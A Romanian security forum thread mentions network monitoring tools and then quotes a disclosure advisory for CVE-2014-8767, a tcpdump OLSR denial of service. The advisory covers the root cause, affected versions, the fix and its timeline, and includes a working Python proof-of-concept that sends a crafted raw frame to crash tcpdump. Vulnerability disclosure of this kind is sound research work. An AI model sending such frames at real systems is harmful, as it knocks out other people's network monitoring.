Aerosol Posted December 1, 2014 Report Share Posted December 1, 2014 Arpwatch and arpsnmp are both network monitoring tools. Both utilities monitor Ethernet or FDDI network traffic and build databases of Ethernet/IP address pairs, and can report certain changes via email.Download Quote Link to comment Share on other sites More sharing options...
shaggi Posted December 1, 2014 Report Share Posted December 1, 2014 Si niste tools compilate pentru Android, le aveam dintr-un apk, pe undeva prin pc..tools.zip — RGhost — file sharing Quote Link to comment Share on other sites More sharing options...
Aerosol Posted December 1, 2014 Author Report Share Posted December 1, 2014 tcpdump 4.6.2 AOVD Unreliable Outputtcpdump 4.6.2 Geonet Denial Of Servicetcpdump 4.6.2 OSLR Denial Of ServiceHa, ha am gasit si cateva exploit-uri interesante CVE-2014-8767 tcpdump denial of service in verbose mode using malformed OLSR payload1. Backgroundtcpdump is a powerful command-line packet analyzer. It allows the user to intercept and display TCP/IP and other packets being transmitted or received over a network to which the computer is attached.2. Summary InformationIt was found out that malformed network traffic (OLSR-based) can lead to an application crash (denial of service) if verbose output of tcpdump monitoring the network is used.3. Technical DescriptionThe application decoder for the OLSR protocol fails to perform external input validation and performs insufficient checking on length computations leading to an unsafe decrement and underflow in the functionolsr_print (const u_char *pptr, u_int length, int is_ipv6)In this function msg_len is extracted from the input without sufficient checks and subtracted sizeof(struct olsr_msg4) which leads to an underflow of msg_tlen which is used to call olsr_print_neighbor() which will crash. In case DNS reverse lookup is enabled, this will also lead to a large amount of invalid DNS reverse lookups.To reproduce start tcpdump on a network interfacesudo tcpdump -i lo -s 0 -n -v(running the program with sudo might hide the segfault message on certain environments, see dmesg for details)and use the following python program to generate a frame on the network (might also need sudo):#!/usr/bin/env pythonfrom socket import socket, AF_PACKET, SOCK_RAWs = socket(AF_PACKET, SOCK_RAW)s.bind(("lo", 0))olsr_frame = "\x00\x1b\xc6\x51\x35\x97\x00\x24\x8c\x7a\xff\x6f\x08\x00\x45\x15\x00\x3d\xf3\x7f\x40\x00\x4d\x11\x30\xc6\x0a\x01\x01\x68\x0a\x02\x02\x02\x02\xba\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x20\x00\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x20\x01\x00\x00\x00"s.send(olsr_frame)4. Affected versionsAffected versions are 3.9.6 through 4.6.25. FixThe problem is fixed in the upcoming version tcpdump 4.7.06. Advisory Timeline2014-11-08 Discovered2014-11-09 Requested CVE2014-11-11 Reported vendor by email2014-11-12 Vendor made a fix available as repository patch2014-11-13 CVE number received2014-11-13 Published CVE advisory7. CreditThe issue was found bySteffen BauchTwitter: @Steffenbauch[url]http://steffenbauch.de[/url]using a slightly enhanced version of american fuzzy lop ([url]https://code.google.com/p/american-fuzzy-lop/[/url]) created by Michal Zalewski. Quote Link to comment Share on other sites More sharing options...
